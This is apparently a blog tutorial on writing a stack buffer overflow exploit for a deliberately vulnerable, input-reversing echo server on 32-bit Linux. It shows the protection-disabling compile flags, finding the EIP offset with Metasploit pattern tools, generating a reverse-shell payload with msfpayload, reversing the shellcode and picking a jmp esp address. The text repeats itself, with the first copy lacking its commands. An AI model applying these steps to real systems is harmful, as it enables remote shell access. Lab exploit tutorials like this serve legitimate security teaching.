EXPLOIT-DEV : Simple Buffer Overflow exploit writing on Linux
I am going to do a simple buffer overflow on 32-bit Linux. The target application software is namely vuln-server which you can download here.
Why I use this software? It is because this echo server is acting difference to normal echo server. It will echo back the message in reverse order.
Does it matter? Yes, it does matter when you are developing the exploit. The shellcode should be reversed and the return address should not be reversed. It is quite difference to the normal exploit writing.
I develop this exploit under BackTrack 5r3 (32-bit). Let's compile this echo server with gcc with the following switches in order to disable the stack protection.
Run the vuln-server :
Open another terminal to run the client :
Enter something on the client, for example :
You will find out that the message you entered is echo back in reverse order.
The server side will display :
Now, write a python script to send 500 bytes of data to the echo server.
Run it and you will find out that the EIP register is overwritten by A's.
Go to create a 500 unique characters to overwrite the EIP.
Copy the result to the captioned python script and replace the junk with the pattern.
Run the python the modified python script again and you will find out that the EIP is overwritten with
Reverse the address and find the offset with the following command :
So, the offset is 339.
Now, to create the shellcode with msfpayload and encoded with alpha_upper encoder in order to avoid the bad characters.
However, we need to reverse the shellcode with the following python script.
Then, add back the "\x" to the shellcode on every two characters.
Okay, it is high time to find the return address.
I select the last one as the return address.
As I mentioned, this echo server is acting difference to others. The flow of the exploit is not running forward but backward. The final exploit python script is like that :
Now, run the listener at port 4444 and run the echo server then run the exploit python script. Yeah, we got the shell.
Therefore, never run any program with root.
That's all! See you.
Why I use this software? It is because this echo server is acting difference to normal echo server. It will echo back the message in reverse order.
Does it matter? Yes, it does matter when you are developing the exploit. The shellcode should be reversed and the return address should not be reversed. It is quite difference to the normal exploit writing.
I develop this exploit under BackTrack 5r3 (32-bit). Let's compile this echo server with gcc with the following switches in order to disable the stack protection.
gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdbRun the vuln-server :
./vuln-server 5700Open another terminal to run the client :
nc -vv 127.0.0.1 5700Connection to 127.0.0.1 5700 port[tcp/*] succeeded!Type QUIT on a line by itself to quitEnter something on the client, for example :
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!Type QUIT on a line by itself to quithello worlddlrow ollehYou will find out that the message you entered is echo back in reverse order.
The server side will display :
127.0.0.1:41959 hello worldNow, write a python script to send 500 bytes of data to the echo server.
Run it and you will find out that the EIP register is overwritten by A's.
Go to create a 500 unique characters to overwrite the EIP.
./pattern_create.rb 500Copy the result to the captioned python script and replace the junk with the pattern.
Run the python the modified python script again and you will find out that the EIP is overwritten with
0x416c3341.Reverse the address and find the offset with the following command :
./pattern_offset.rb 0x41336c41 500[*] Exact match at offset 339So, the offset is 339.
Now, to create the shellcode with msfpayload and encoded with alpha_upper encoder in order to avoid the bad characters.
msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upperHowever, we need to reverse the shellcode with the following python script.
shellcode = "blah blah ...."shellcode = shellcode[::-1]shellcode.encode("hex")print shellcodeThen, add back the "\x" to the shellcode on every two characters.
Okay, it is high time to find the return address.
msfelfscan -j esp vuln-server[vuln-server]0x08064e49 push esp; ret0x08064ea7 push esp; ret0x08065f71 push esp; ret0x08081949 push esp; ret0x08085df9 push esp; retn 0x89340x080a56e9 push esp; ret0x080c37ab jmp esp0x080c388f jmp esp0x080c38b7 jmp esp0x080c3c3f jmp esp0x080c3d17 jmp esp0x080c3da7 jmp esp0x080c3db3 jmp esp0x080c3dd3 jmp esp0x080c532b jmp esp <----- selected this oneI select the last one as the return address.
As I mentioned, this echo server is acting difference to others. The flow of the exploit is not running forward but backward. The final exploit python script is like that :
Now, run the listener at port 4444 and run the echo server then run the exploit python script. Yeah, we got the shell.
Therefore, never run any program with root.
That's all! See you.
